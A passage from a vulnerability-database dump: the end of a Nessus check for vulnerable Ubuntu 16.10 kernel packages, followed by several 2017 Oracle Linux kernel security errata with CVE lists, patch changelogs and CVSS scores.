pkgname:\"linux-image-4.8.0-39-lowlatency\", pkgver:\"4.8.0-39.42\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-generic\", pkgver:\"4.8.0.39.50\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.8.0.39.50\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.8.0.39.50\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-raspi2\", pkgver:\"4.8.0.1026.29\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.8-generic / linux-image-4.8-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8633", "CVE-2016-8399", "CVE-2016-10088", "CVE-2017-2636", "CVE-2016-7425", "CVE-2017-6345", "CVE-2016-3140", "CVE-2017-7187", "CVE-2016-10142", "CVE-2015-5707", "CVE-2016-4580", "CVE-2016-3672", "CVE-2016-8645", "CVE-2015-4700"], "description": "[2.6.39-400.294.6]\n- RHEL: complement upstream workaround for CVE-2016-10142. (Quentin Casasnovas) [Orabug: 25765786] {CVE-2016-10142} {CVE-2016-10142}\n[2.6.39-400.294.5]\n- net: ping: check minimum size on ICMP header length (Kees Cook) [Orabug: 25766914] {CVE-2016-8399}\n- ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) [Orabug: 25765786] {CVE-2016-10142}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al Viro) [Orabug: 25765448] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) [Orabug: 25752011] {CVE-2017-7187}\n[2.6.39-400.294.4]\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: 25696689] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: 25696689] {CVE-2017-2636}\n- drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian Frederick) [Orabug: 25696689] {CVE-2017-2636}\n- list: introduce list_first_entry_or_null (Jiri Pirko) [Orabug: 25696689] {CVE-2017-2636}\n- firewire: net: guard against rx buffer overflows (Stefan Richter) [Orabug: 25451538] {CVE-2016-8633}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector Marco-Gisbert) [Orabug: 25463929] {CVE-2016-3672}\n- x86 get_unmapped_area: Access mmap_legacy_base through mm_struct member (Radu Caragea) [Orabug: 25463929] {CVE-2016-3672}\n- sg_start_req(): make sure that there's not too many elements in iovec (Al Viro) [Orabug: 25490377] {CVE-2015-5707}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) [Orabug: 25507232] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: 25507232] {CVE-2016-8645}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan Carpenter) [Orabug: 25507330] {CVE-2016-7425}\n- x86: bpf_jit: fix compilation of large bpf programs (Alexei Starovoitov) [Orabug: 25507375] {CVE-2015-4700}\n- net: fix a kernel infoleak in x25 module (Kangjie Lu) [Orabug: 25512417] {CVE-2016-4580}\n- USB: digi_acceleport: do sanity checking for the number of ports (Oliver Neukum) [Orabug: 25512472] {CVE-2016-3140}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: 25682437] {CVE-2017-6345}", "edition": 4, "modified": "2017-03-31T00:00:00", "published": "2017-03-31T00:00:00", "id": "ELSA-2017-3535", "href": "http://linux.oracle.com/errata/ELSA-2017-3535.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:09", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7097", "CVE-2016-8633", "CVE-2016-8399", "CVE-2016-10088", "CVE-2017-6001", "CVE-2017-5970", "CVE-2015-8952", "CVE-2017-2636", "CVE-2016-8632", "CVE-2016-9178", "CVE-2016-7425", "CVE-2016-3951", "CVE-2016-10147", "CVE-2016-9756", "CVE-2017-6345", "CVE-2017-2596", "CVE-2016-9588", "CVE-2016-3140", "CVE-2017-7187", "CVE-2016-9644", "CVE-2016-3672", "CVE-2016-8645", "CVE-2017-5897"], "description": "kernel-uek\n[4.1.12-61.1.33]\n- Revert 'x86/mm: Expand the exception table logic to allow new handling options' (Brian Maly) [Orabug: 25790387] {CVE-2016-9644}\n- Revert 'fix minor infoleak in get_user_ex()' (Brian Maly) [Orabug: 25790387] {CVE-2016-9644}\n[4.1.12-61.1.32]\n- x86/mm: Expand the exception table logic to allow new handling options (Tony Luck) [Orabug: 25790387] {CVE-2016-9644}\n[4.1.12-61.1.31]\n- rebuild bumping release\n[4.1.12-61.1.30]\n- net: ping: check minimum size on ICMP header length (Kees Cook) [Orabug: 25766898] {CVE-2016-8399} {CVE-2016-8399}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al Viro) [Orabug: 25765436] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) [Orabug: 25751984] {CVE-2017-7187}\n[4.1.12-61.1.29]\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: 25696677] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: 25696677] {CVE-2017-2636}\n- If Slot Status indicates changes in both Data Link Layer Status and Presence Detect, prioritize the Link status change. (Jack Vogel) [Orabug: 25353783] \n- PCI: pciehp: Leave power indicator on when enabling already-enabled slot (Ashok Raj) [Orabug: 25353783] \n- firewire: net: guard against rx buffer overflows (Stefan Richter) [Orabug: 25451520] {CVE-2016-8633}\n- usbnet: cleanup after bind() in probe() (Oliver Neukum) [Orabug: 25463898] {CVE-2016-3951}\n- cdc_ncm: do not call usbnet_link_change from cdc_ncm_bind (Bjorn Mork) [Orabug: 25463898] {CVE-2016-3951}\n- cdc_ncm: Add support for moving NDP to end of NCM frame (Enrico Mioso) [Orabug: 25463898] {CVE-2016-3951}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector Marco-Gisbert) [Orabug: 25463918] {CVE-2016-3672}\n- kvm: fix page struct leak in handle_vmon (Paolo Bonzini) [Orabug: 25507133] {CVE-2017-2596}\n- crypto: mcryptd - Check mcryptd algorithm compatibility (tim) [Orabug: 25507153] {CVE-2016-10147}\n- kvm: nVMX: Allow L1 to intercept software exceptions (#BP and #OF) (Jim Mattson) [Orabug: 25507188] {CVE-2016-9588}\n- KVM: x86: drop error recovery in em_jmp_far and em_ret_far (Radim Krcmar) [Orabug: 25507213] {CVE-2016-9756}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) [Orabug: 25507226] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: 25507226] {CVE-2016-8645}\n- tipc: check minimum bearer MTU (Michal Kubecek) [Orabug: 25507239] {CVE-2016-8632} {CVE-2016-8632}\n- fix minor infoleak in get_user_ex() (Al Viro) [Orabug: 25507269] {CVE-2016-9178}\n- scsi: arcmsr: Simplify user_len checking (Borislav Petkov) [Orabug: 25507319] {CVE-2016-7425}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan Carpenter) [Orabug: 25507319] {CVE-2016-7425}\n- tmpfs: clear S_ISGID when setting posix ACLs (Gu Zheng) [Orabug: 25507341] {CVE-2016-7097} {CVE-2016-7097}\n- posix_acl: Clear SGID bit when setting file permissions (Jan Kara) [Orabug: 25507341] {CVE-2016-7097} {CVE-2016-7097}\n- ext2: convert to mbcache2 (Jan Kara) [Orabug: 25512366] {CVE-2015-8952}\n- ext4: convert to mbcache2 (Jan Kara) [Orabug: 25512366] {CVE-2015-8952}\n- mbcache2: reimplement mbcache (Jan Kara) [Orabug: 25512366] {CVE-2015-8952}\n- USB: digi_acceleport: do sanity checking for the number of ports (Oliver Neukum) [Orabug: 25512466] {CVE-2016-3140}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: 25682419] {CVE-2017-6345}\n- net/mlx4_core: Disallow creation of RAW QPs on a VF (Eli Cohen) [Orabug: 25697847] \n- ipv4: keep skb->dst around in presence of IP options (Eric Dumazet) [Orabug: 25698300] {CVE-2017-5970}\n- perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race (Peter Zijlstra) [Orabug: 25698751] {CVE-2017-6001}\n- ip6_gre: fix ip6gre_err() invalid reads (Eric Dumazet) [Orabug: 25699015] {CVE-2017-5897}\n- mpt3sas: Dont spam logs if logging level is 0 (Johannes Thumshirn) [Orabug: 25699035] \n- xen-netfront: cast grant table reference first to type int (Dongli Zhang) \n- xen-netfront: do not cast grant table reference to signed short (Dongli Zhang)", "edition": 4, "modified": "2017-03-31T00:00:00", "published": "2017-03-31T00:00:00", "id": "ELSA-2017-3533", "href": "http://linux.oracle.com/errata/ELSA-2017-3533.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2782", "CVE-2017-7895", "CVE-2017-7184", "CVE-2016-7910", "CVE-2016-8633", "CVE-2017-6074", "CVE-2016-8399", "CVE-2015-1420", "CVE-2016-10088", "CVE-2015-6252", "CVE-2015-9731", "CVE-2015-5257", "CVE-2017-2636", "CVE-2017-2583", "CVE-2016-7425", "CVE-2017-6214", "CVE-2016-4485", "CVE-2016-4482", "CVE-2017-6345", "CVE-2017-5669", "CVE-2017-2647", "CVE-2017-5986", "CVE-2016-3140", "CVE-2016-10229", "CVE-2013-7446", "CVE-2017-7187", "CVE-2016-10142", "CVE-2015-5707", "CVE-2016-4580", "CVE-2016-3672", "CVE-2016-8645", "CVE-2015-6937", "CVE-2015-4700"], "description": "[2.6.39-400.295.2]\n- nfsd: stricter decoding of write-like NFSv2/v3 ops (J. Bruce Fields) [Orabug: 25986995] {CVE-2017-7895}\n[2.6.39-400.295.1]\n- ocfs2/o2net: o2net_listen_data_ready should do nothing if socket state is not TCP_LISTEN (Tariq Saeed) [Orabug: 25510857] \n- IB/CORE: sync the resouce access in fmr_pool (Wengang Wang) [Orabug: 23750748] \n- ipv6: Skip XFRM lookup if dst_entry in socket cache is valid (Jakub Sitnicki) [Orabug: 25534688] \n- uek-rpm: enable CONFIG_KSPLICE. (Jamie Iles) [Orabug: 25549845] \n- ksplice: add sysctls for determining Ksplice features. (Jamie Iles) [Orabug: 25549845] \n- signal: protect SIGNAL_UNKILLABLE from unintentional clearing. (Jamie Iles) [Orabug: 25549845] \n- KVM: x86: fix emulation of 'MOV SS, null selector' (Paolo Bonzini) [Orabug: 25719676] {CVE-2017-2583} {CVE-2017-2583}\n- sctp: avoid BUG_ON on sctp_wait_for_sndbuf (Marcelo Ricardo Leitner) [Orabug: 25719811] {CVE-2017-5986}\n- tcp: avoid infinite loop in tcp_splice_read() (Eric Dumazet) [Orabug: 25720815] {CVE-2017-6214}\n- USB: visor: fix null-deref at probe (Johan Hovold) [Orabug: 25796604] {CVE-2016-2782}\n- ipc/shm: Fix shmat mmap nil-page protection (Davidlohr Bueso) [Orabug: 25797014] {CVE-2017-5669}\n- vhost: actually track log eventfd file (Marc-Andre Lureau) [Orabug: 25797056] {CVE-2015-6252}\n- xfrm_user: validate XFRM_MSG_NEWAE incoming ESN size harder (Andy Whitcroft) [Orabug: 25814664] {CVE-2017-7184}\n- xfrm_user: validate XFRM_MSG_NEWAE XFRMA_REPLAY_ESN_VAL replay_window (Andy Whitcroft) [Orabug: 25814664] {CVE-2017-7184}\n- KEYS: Remove key_type::match in favour of overriding default by match_preparse (David Howells) [Orabug: 25823965] {CVE-2017-2647} {CVE-2017-2647}\n- USB: whiteheat: fix potential null-deref at probe (Johan Hovold) [Orabug: 25825107] {CVE-2015-5257}\n- RDS: fix race condition when sending a message on unbound socket (Quentin Casasnovas) [Orabug: 25871048] {CVE-2015-6937} {CVE-2015-6937}\n- udf: Check path length when reading symlink (Jan Kara) [Orabug: 25871104] {CVE-2015-9731}\n- udf: Treat symlink component of type 2 as / (Jan Kara) [Orabug: 25871104] {CVE-2015-9731}\n- udp: properly support MSG_PEEK with truncated buffers (Eric Dumazet) [Orabug: 25874741] {CVE-2016-10229}\n- block: fix use-after-free in seq file (Vegard Nossum) [Orabug: 25877531] {CVE-2016-7910}\n- RHEL: complement upstream workaround for CVE-2016-10142. (Quentin Casasnovas) [Orabug: 25765786] {CVE-2016-10142} {CVE-2016-10142}\n- net: ping: check minimum size on ICMP header length (Kees Cook) [Orabug: 25766914] {CVE-2016-8399}\n- ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) [Orabug: 25765786] {CVE-2016-10142}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al Viro) [Orabug: 25765448] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) [Orabug: 25752011] {CVE-2017-7187}\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: 25696689] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: 25696689] {CVE-2017-2636}\n- drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian Frederick) [Orabug: 25696689] {CVE-2017-2636}\n- list: introduce list_first_entry_or_null (Jiri Pirko) [Orabug: 25696689] {CVE-2017-2636}\n- firewire: net: guard against rx buffer overflows (Stefan Richter) [Orabug: 25451538] {CVE-2016-8633}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector Marco-Gisbert) [Orabug: 25463929] {CVE-2016-3672}\n- x86 get_unmapped_area: Access mmap_legacy_base through mm_struct member (Radu Caragea) [Orabug: 25463929] {CVE-2016-3672}\n- sg_start_req(): make sure that there's not too many elements in iovec (Al Viro) [Orabug: 25490377] {CVE-2015-5707}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) [Orabug: 25507232] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: 25507232] {CVE-2016-8645}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan Carpenter) [Orabug: 25507330] {CVE-2016-7425}\n- x86: bpf_jit: fix compilation of large bpf programs (Alexei Starovoitov) [Orabug: 25507375] {CVE-2015-4700}\n- net: fix a kernel infoleak in x25 module (Kangjie Lu) [Orabug: 25512417] {CVE-2016-4580}\n- USB: digi_acceleport: do sanity checking for the number of ports (Oliver Neukum) [Orabug: 25512472] {CVE-2016-3140}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: 25682437] {CVE-2017-6345}\n- dccp: fix freeing skb too early for IPV6_RECVPKTINFO (Andrey Konovalov) [Orabug: 25598277] {CVE-2017-6074}\n- vfs: read file_handle only once in handle_to_path (Sasha Levin) [Orabug: 25388709] {CVE-2015-1420}\n- crypto: algif_hash - Only export and import on sockets with data (Herbert Xu) [Orabug: 25417807] \n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: 25462763] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462811] {CVE-2016-4485}\n- af_unix: Guard against other == sk in unix_dgram_sendmsg (Rainer Weikusat) [Orabug: 25464000] {CVE-2013-7446}\n- unix: avoid use-after-free in ep_remove_wait_queue (Rainer Weikusat) [Orabug: 25464000] {CVE-2013-7446}", "edition": 4, "modified": "2017-05-16T00:00:00", "published": "2017-05-16T00:00:00", "id": "ELSA-2017-3567", "href": "http://linux.oracle.com/errata/ELSA-2017-3567.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4485", "CVE-2016-4482", "CVE-2016-8646", "CVE-2013-7446"], "description": "kernel-uek\n[3.8.13-118.16.3]\n- crypto: algif_hash - Only export and import on sockets with data (Herbert Xu) [Orabug: 25417805] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: 25462760] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462807] {CVE-2016-4485}\n- af_unix: Guard against other == sk in unix_dgram_sendmsg (Rainer Weikusat) [Orabug: 25463996] {CVE-2013-7446}\n- unix: avoid use-after-free in ep_remove_wait_queue (Rainer Weikusat) [Orabug: 25463996] {CVE-2013-7446}", "edition": 4, "modified": "2017-02-09T00:00:00", "published": "2017-02-09T00:00:00", "id": "ELSA-2017-3515", "href": "http://linux.oracle.com/errata/ELSA-2017-3515.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1420", "CVE-2016-4485", "CVE-2016-4482", "CVE-2016-8646", "CVE-2013-7446"], "description": "[2.6.39-400.294.2]\n- vfs: read file_handle only once in handle_to_path (Sasha Levin) [Orabug: 25388709] {CVE-2015-1420}\n- crypto: algif_hash - Only export and import on sockets with data (Herbert Xu) [Orabug: 25417807] \n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: 25462763] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462811] {CVE-2016-4485}\n- af_unix: Guard against other == sk in unix_dgram_sendmsg (Rainer Weikusat) [Orabug: 25464000] {CVE-2013-7446}\n- unix: avoid use-after-free in ep_remove_wait_queue (Rainer Weikusat) [Orabug: 25464000] {CVE-2013-7446}", "edition": 4, "modified": "2017-02-09T00:00:00", "published": "2017-02-09T00:00:00", "id": "ELSA-2017-3516", "href": "http://linux.oracle.com/errata/ELSA-2017-3516.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2017-6074", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "description": "- [3.10.0-514.16.1.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [bug 24817676]\n[3.10.0-514.16.1]\n- [tty] n_hdlc: get rid of racy n_hdlc.tbuf ('Herton R. Krzesinski') [1429919 1429920] {CVE-2017-2636}\n- [md] dm rq: cope with DM device destruction while in dm_old_request_fn() (Mike Snitzer) [1430334 1412854]\n- [fs] nfs: Fix inode corruption in nfs_prime_dcache() (Benjamin Coddington) [1429514 1416532]\n- [fs] nfs: Don't let readdirplus revalidate an inode that was marked as stale (Benjamin Coddington) [1429514 1416532]\n- [block] Copy a user iovec if it includes gaps (Jeff Moyer) [1429508 1421263]\n- [kernel] percpu-refcount: fix reference leak during percpu-atomic transition (Jeff Moyer) [1429507 1418333]\n- [powerpc] eeh: eeh_pci_enable(): fix checking of post-request state (Steve Best) [1425538 1383670]\n- [s390] mm: handle PTE-mapped tail pages in fast gup (Hendrik Brueckner) [1423438 1391532]\n- [net] skbuff: Fix skb checksum partial check (Lance Richardson) [1422964 1411480]\n- [net] skbuff: Fix skb checksum flag on skb pull (Lance Richardson) [1422964 1411480]\n- [security] selinux: fix off-by-one in setprocattr (Paul Moore) [1422368 1422369] {CVE-2017-2618}\n- [virtio] balloon: check the number of available pages in leak balloon (David Hildenbrand) [1417194 1401615]\n- [infiniband] ib/rdmavt: Only put mmap_info ref if it exists (Jonathan Toppins) [1417191 1391299]\n- [x86] kvm: x86: make lapic hrtimer pinned (Luiz Capitulino) [1416373 1392593]\n- [kernel] sched/nohz: Fix affine unpinned timers mess (Luiz Capitulino) [1416373 1392593]\n- [kernel] nohz: Affine unpinned timers to housekeepers (Luiz Capitulino) [1416373 1392593]\n- [kernel] tick-sched: add housekeeping_mask cpumask (Luiz Capitulino) [1416373 1392593]\n- [x86] platform/uv/bau: Add UV4-specific functions (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Fix payload queue setup on UV4 hardware (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Disable software timeout on UV4 hardware (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Populate ->uvhub_version with UV4 version information (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Use generic function pointers (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Add generic function pointers (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Convert uv_physnodeaddr() use to uv_gpa_to_offset() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up pq_init() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up and update printks (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up vertical alignment (Frank Ramsay) [1414715 1386692]\n- [virtio] virtio-pci: alloc only resources actually used (Laurent Vivier) [1413093 1375153]\n- [net] avoid signed overflows for SO_{SND|RCV}BUFFORCE (Sabrina Dubroca) [1412473 1412474] {CVE-2016-9793}\n- [netdrv] sfc: clear napi_hash state when copying channels (Jarod Wilson) [1401461 1394304]\n- [lib] mpi: Fix NULL ptr dereference in mpi_powm() (Mateusz Guzik) [1398457 1398458] {CVE-2016-8650}\n- [scsi] lpfc: Fix eh_deadline setting for sli3 adapters (Ewan Milne) [1430687 1366564]\n- [md] dm round robin: revert 'use percpu 'repeat_count' and 'current_path'' (Mike Snitzer) [1430689 1422567]\n- [md] dm round robin: do not use this_cpu_ptr() without having preemption disabled (Mike Snitzer) [1430689 1422567]\n- Revert: [x86] Handle non enumerated CPU after physical hotplug (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] smp: Don't try to poke disabled/non-existent APIC (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] smpboot: Init apic mapping before usage (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] revert 'perf/uncore: Disable uncore on kdump kernel' (Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] perf/x86/intel/uncore: Fix hardcoded socket 0 assumption in the Haswell init code (Prarit Bhargava) [1426633 1373738]\n[3.10.0-514.15.1]\n- [net] vxlan: fix oops in dev_fill_metadata_dst (Paolo Abeni) [1427847 1423068]\n- [x86] perf/x86/intel/uncore: Fix hardcoded socket 0 assumption in the Haswell init code (Prarit Bhargava) [1426633 1373738]\n- [x86] revert 'perf/uncore: Disable uncore on kdump kernel' (Prarit Bhargava) [1426633 1373738]\n- [x86] smpboot: Init apic mapping before usage (Prarit Bhargava) [1426633 1373738]\n- [x86] smp: Don't try to poke disabled/non-existent APIC (Prarit Bhargava) [1426633 1373738]\n- [x86] Handle non enumerated CPU after physical hotplug (Prarit Bhargava) [1426633 1373738]\n- [x86] perf/x86: Fix NMI measurements (Jiri Olsa) [1425804 1405101]\n- [x86] Warn when NMI handlers take large amounts of time (Jiri Olsa) [1425804 1405101]\n- [nvme] apply DELAY_BEFORE_CHK_RDY quirk at probe time too (Gustavo Duarte) [1423439 1409122]\n- [crypto] qat - zero esram only for DH85x devices (Neil Horman) [1422575 1382849]\n- [crypto] qat - fix bar discovery for c62x (Neil Horman) [1422575 1382849]\n- [fs] xfs: remove racy hasattr check from attr ops (Brian Foster) [1421202 1395538]\n- [fs] dlm: free workqueues after the connections (Marcelo Leitner) [1421197 1383710]\n- [netdrv] igb: re-assign hw address pointer on reset after PCI error (Gustavo Duarte) [1419459 1413043]\n- [kernel] timekeeping: Increment clock_was_set_seq in timekeeping_init() (Prarit Bhargava) [1418947 1409214]\n- [kernel] timekeeping: Use timekeeping_update() instead of memcpy() (Prarit Bhargava) [1418947 1409214]\n- [fs] libceph: no need to drop con->mutex for ->get_authorizer() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: drop len argument of *verify_authorizer_reply() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: verify authorize reply on connect (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: no need for GFP_NOFS in ceph_monc_init() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: stop allocating a new cipher on every crypto request (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: uninline ceph_crypto_key_destroy() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: remove now unused ceph_*{en, de}crypt*() functions (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: switch ceph_x_decrypt() to ceph_crypt() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: switch ceph_x_encrypt() to ceph_crypt() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: tweak calcu_signature() a little (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: rename and align ceph_x_authorizer::reply_buf (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: introduce ceph_crypt() for in-place en/decryption (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: introduce ceph_x_encrypt_offset() (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: old_key in process_one_ticket() is redundant (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: ceph_x_encrypt_buflen() takes in_len (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: Remove unnecessary ivsize variables (Ilya Dryomov) [1418316 1408170]\n- [fs] libceph: Use skcipher (Ilya Dryomov) [1418316 1408170]\n- [scsi] scsi_lib: correctly retry failed zero length REQ_TYPE_FS commands (Ewan Milne) [1417923 1403849]\n- [netdrv] ibmvnic: Start completion queue negotiation at server-provided optimum values (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Fix missing brackets in init_sub_crq_irqs (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Fix releasing of sub-CRQ IRQs in interrupt context (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Update MTU after device initialization (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Fix GFP_KERNEL allocation in interrupt context (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: fix error return code in ibmvnic_probe() (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: convert to use simple_open() (Steve Best) [1415144 1403396]\n- [netdrv] ibmvnic: Handle backing device failover and reinitialization (Steve Best) [1418309 1403692]\n- [tools] perf ppc64le: Fix build failure when libelf is not present (Jiri Olsa) [1414710 1376534]\n- [tools] perf probe ppc64le: Fix probe location when using DWARF (Jiri Olsa) [1414710 1376534]\n- [tools] perf probe: Add function to post process kernel trace events (Jiri Olsa) [1414710 1376534]\n- [tools] perf symbols: Fix kallsyms perf test on ppc64le (Jiri Olsa) [1414710 1376534]\n- [tools] perf powerpc: Fix kprobe and kretprobe handling with kallsyms on ppc64le (Jiri Olsa) [1414710 1376534]\n- [netdrv] bnx2x: Use the correct divisor value for PHC clock readings (Michal Schmidt) [1413996 1175585]\n- [fs] seq_file: reset iterator to first record for zero offset (Miklos Szeredi) [1413681 1386642]\n[3.10.0-514.14.1]\n- [net] dccp: fix freeing skb too early for IPV6_RECVPKTINFO (Hannes Frederic Sowa) [1423462 1423463] {CVE-2017-6074}\n- [net] sctp: check af before verify address in sctp_addr_id2transport (Xin Long) [1419837 1414389]\n- [net] sctp: sctp_addr_id2transport should verify the addr before looking up assoc (Xin Long) [1419837 1414389]\n[3.10.0-514.13.1]\n- [fs] gfs2: Reduce contention on gfs2_log_lock (Robert S Peterson) [1422380 1406850]\n- [fs] gfs2: Inline function meta_lo_add (Robert S Peterson) [1422380 1406850]\n- [fs] gfs2: Switch tr_touched to flag in transaction (Robert S Peterson) [1422380 1406850]\n- [fs] xfs: ioends require logically contiguous file offsets (Brian Foster) [1421203 1398005]\n- [fs] xfs: don't chain ioends during writepage submission (Brian Foster) [1421203 1398005]\n- [fs] xfs: factor mapping out of xfs_do_writepage (Brian Foster) [1421203 1398005]\n- [fs] xfs: xfs_cluster_write is redundant (Brian Foster) [1421203 1398005]\n- [fs] xfs: Introduce writeback context for writepages (Brian Foster) [1421203 1398005]\n- [fs] xfs: remove xfs_cancel_ioend (Brian Foster) [1421203 1398005]\n- [fs] xfs: remove nonblocking mode from xfs_vm_writepage (Brian Foster) [1421203 1398005]\n- [fs] mm/filemap.c: make global sync not clear error status of individual inodes (Brian Foster) [1421203 1398005]\n[3.10.0-514.12.1]\n- [fs] fscache: Fix dead object requeue (David Howells) [1420737 1415402]\n[3.10.0-514.11.1]\n- [scsi] qla2xxx: Get mutex lock before checking optrom_state (Chad Dupuis) [1418317 1408387]\n- [mm] memcontrol: do not recurse in direct reclaim (Rik van Riel) [1417192 1397330]", "edition": 4, "modified": "2017-04-12T00:00:00", "published": "2017-04-12T00:00:00", "id": "ELSA-2017-0933", "href": "http://linux.oracle.com/errata/ELSA-2017-0933.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": 